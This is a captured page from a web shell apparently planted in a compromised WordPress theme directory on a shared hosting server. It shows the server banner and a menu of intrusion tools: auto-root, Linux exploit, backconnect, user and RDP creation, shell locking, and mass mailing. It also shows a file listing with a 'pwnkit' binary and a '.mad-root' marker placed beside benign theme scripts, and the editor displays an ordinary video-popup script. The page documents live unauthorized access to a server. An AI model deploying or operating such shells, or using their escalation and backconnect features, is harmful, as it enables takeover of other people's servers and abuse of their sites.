Linux webd002.cluster130.gra.hosting.ovh.net 6.18.39-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Tue Jul 21 12:03:15 CEST 2026 x86_64
Apache
: 10.130.40.2 | : 216.73.217.172
Cant Read [ /etc/named.conf ]
8.3.31
espacpq
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
espacpq /
www /
wp-content /
themes /
alpha /
js /
[ HOME SHELL ]
Name
Size
Permission
Action
vendor
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
accordion.js
687
B
-rw-r--r--
buttons.js
858
B
-rw-r--r--
customizer.js
1018
B
-rw-r--r--
navigation.js
2.22
KB
-rw-r--r--
pwnkit
0
B
-rwxr-xr-x
slider.js
1008
B
-rw-r--r--
tabs.js
791
B
-rw-r--r--
video-popup.js
1.92
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : video-popup.js
( function ( $ ) { function getPlayerLink( href ) { const videoPlayers = { vimeo: { search: /https?:\/\/vimeo\.com\/(\d+)/, replace: "https://player.vimeo.com/video/$1?autoplay=1", }, youtube: { search: /https?:\/\/www\.youtube\.com\/watch\?v=(.*?)/, replace: "https://www.youtube.com/embed/$1", }, youtube_short: { search: /https?:\/\/youtu\.be\/(.*?)/, replace: "https://www.youtube.com/embed/$1", }, }; for ( const [ _, player ] of Object.entries( videoPlayers ) ) { if ( href.match( player.search ) ) { const playerLink = href.replace( player.search, player.replace ); return playerLink; } } return false; } function maybeAddPopup( link ) { const $link = $( link ); const href = $link.prop( "href" ); const playerLink = getPlayerLink( href ); if ( false !== playerLink ) { $link.data( "vimeo-player-url", playerLink ); link.addEventListener( "click", handleVideoPopup ); // Add icon to link if it does not have an icon const $icon = $link.find( '[class^="aicon-"]' ); if ( 0 === $icon.length ) { $link.prepend( '<span class="aicon-play"></span>' ); } } } function handleVideoPopup( event ) { const link = event.currentTarget; const $link = $( link ); event.preventDefault(); const playerLink = $link.data( "vimeo-player-url" ); const $popup = $( `<div class="alpha-modal-container"><div class="alpha-modal"><div class="alpha-modal-player"><a href="#" class="aicon-close close"></a><iframe src="${ playerLink }" frameborder="0" allowfullscreen allow="autoplay" tabindex="-1"></div></div></div>` ); $popup.appendTo( $( "body" ) ); } $( document ).on( "click", ".alpha-modal .close", function ( event ) { event.preventDefault(); $( this ).closest( ".alpha-modal-container" ).remove(); } ); const links = document.querySelectorAll( "a" ); for ( const link of links ) { maybeAddPopup( link ); } } )( jQuery );
Close